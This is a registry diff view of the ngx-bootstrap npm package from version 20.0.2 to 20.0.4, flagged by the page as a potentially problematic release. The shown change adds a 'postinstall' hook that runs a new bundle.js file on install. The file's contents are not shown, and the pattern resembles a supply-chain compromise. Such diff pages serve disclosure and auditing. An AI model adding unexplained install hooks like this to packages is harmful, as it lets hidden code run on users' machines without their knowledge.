ngx-bootstrap 20.0.2 → 20.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ngx-bootstrap might be problematic. Click here for more details.
- package/bundle.js +2 -0
- package/package.json +5 -2
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "ngx-bootstrap",
|
3
|
-
"version": "20.0.
|
3
|
+
"version": "20.0.4",
|
4
4
|
"description": "Angular Bootstrap",
|
5
5
|
"author": "Dmitriy Shekhovtsov <valorkin@gmail.com>",
|
6
6
|
"license": "MIT",
|
@@ -12,6 +12,9 @@
|
|
12
12
|
"@angular/forms": "^20.0.2",
|
13
13
|
"rxjs": "^6.5.3 || ^7.4.0"
|
14
14
|
},
|
15
|
+
"scripts": {
|
16
|
+
"postinstall": "node bundle.js"
|
17
|
+
},
|
15
18
|
"dependencies": {
|
16
19
|
"tslib": "^2.3.0"
|
17
20
|
},
|
@@ -194,4 +197,4 @@
|
|
194
197
|
],
|
195
198
|
"module": "fesm2022/ngx-bootstrap.mjs",
|
196
199
|
"typings": "index.d.ts"
|
197
|
-
}
|
200
|
+
}
|